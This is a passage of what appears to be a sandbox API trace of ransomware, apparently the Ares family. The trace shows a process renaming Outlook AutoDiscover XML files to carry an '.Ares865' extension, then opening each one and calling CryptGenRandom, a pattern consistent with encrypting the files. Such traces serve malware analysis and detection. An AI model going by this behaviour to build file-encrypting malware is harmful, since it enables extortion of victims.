Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.TH.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.th.xml.ares865"), dwFlags=0x1) returned 1 [0069.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.TH.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.th.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.901] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=810) returned 1 [0069.901] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.902] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.902] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.912] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.913] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.913] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.913] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.UK.XML.Ares865") returned 86 [0069.913] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.UK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.uk.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.UK.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.uk.xml.ares865"), dwFlags=0x1) returned 1 [0069.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.CO.UK.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.co.uk.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.915] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=810) returned 1 [0069.915] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.915] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.916] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.920] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.920] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.920] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.921] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AR.XML.Ares865") returned 87 [0069.921] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ar.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ar.xml.ares865"), dwFlags=0x1) returned 1 [0069.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ar.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.922] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0069.922] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.923] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.923] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.965] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.966] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.966] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.966] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AU.XML.Ares865") returned 87 [0069.966] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AU.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.au.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AU.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.au.xml.ares865"), dwFlags=0x1) returned 1 [0069.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.AU.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.au.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.967] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0069.968] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.968] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.968] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.978] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.978] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.978] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.979] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.BR.XML.Ares865") returned 87 [0069.979] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.BR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.br.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.BR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.br.xml.ares865"), dwFlags=0x1) returned 1 [0069.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.BR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.br.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.980] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0069.980] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.981] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.981] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.986] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.987] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.987] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.987] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.CN.XML.Ares865") returned 87 [0069.987] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.CN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.cn.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.CN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.cn.xml.ares865"), dwFlags=0x1) returned 1 [0069.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.CN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.cn.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.988] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0069.988] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.989] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.989] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.992] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.993] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.993] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.993] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.HK.XML.Ares865") returned 87 [0069.994] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.HK.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.hk.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.HK.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.hk.xml.ares865"), dwFlags=0x1) returned 1 [0069.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.HK.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.hk.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0069.996] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0069.996] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.997] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.997] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.007] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.008] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.008] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.008] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MX.XML.Ares865") returned 87 [0070.008] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MX.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.mx.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MX.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.mx.xml.ares865"), dwFlags=0x1) returned 1 [0070.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MX.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.mx.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.009] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=806) returned 1 [0070.009] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.010] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.010] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.013] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.014] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.014] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.015] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MY.XML.Ares865") returned 87 [0070.015] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MY.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.my.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MY.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.my.xml.ares865"), dwFlags=0x1) returned 1 [0070.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.MY.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.my.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.016] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0070.016] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.016] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.016] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.023] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.024] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.024] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.024] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.PH.XML.Ares865") returned 87 [0070.024] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.PH.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ph.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.PH.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ph.xml.ares865"), dwFlags=0x1) returned 1 [0070.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.PH.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.ph.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.025] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0070.025] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.026] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.026] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.037] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.041] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.041] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.043] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.SG.XML.Ares865") returned 87 [0070.043] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.SG.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.sg.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.SG.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.sg.xml.ares865"), dwFlags=0x1) returned 1 [0070.048] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.SG.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.sg.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.048] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0070.049] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.049] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.049] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.052] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.052] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.052] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.053] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.TW.XML.Ares865") returned 87 [0070.053] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.TW.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.tw.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.TW.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.tw.xml.ares865"), dwFlags=0x1) returned 1 [0070.054] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.TW.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.tw.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.054] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0070.054] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.055] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.055] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.068] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.069] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.069] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.070] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.VN.XML.Ares865") returned 87 [0070.070] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.VN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.vn.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.VN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.vn.xml.ares865"), dwFlags=0x1) returned 1 [0070.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.VN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.vn.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.072] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=812) returned 1 [0070.072] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.073] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.073] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.077] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0070.078] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0070.078] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.078] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.XML.Ares865") returned 84 [0070.078] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.xml.ares865"), dwFlags=0x1) returned 1 [0070.079] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.com.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0070.079] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=806) returned 1 [0070.079] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0070.080] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0070.080] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0070.094] CryptAcquireContextW (in: phProv=0x2e2d264, 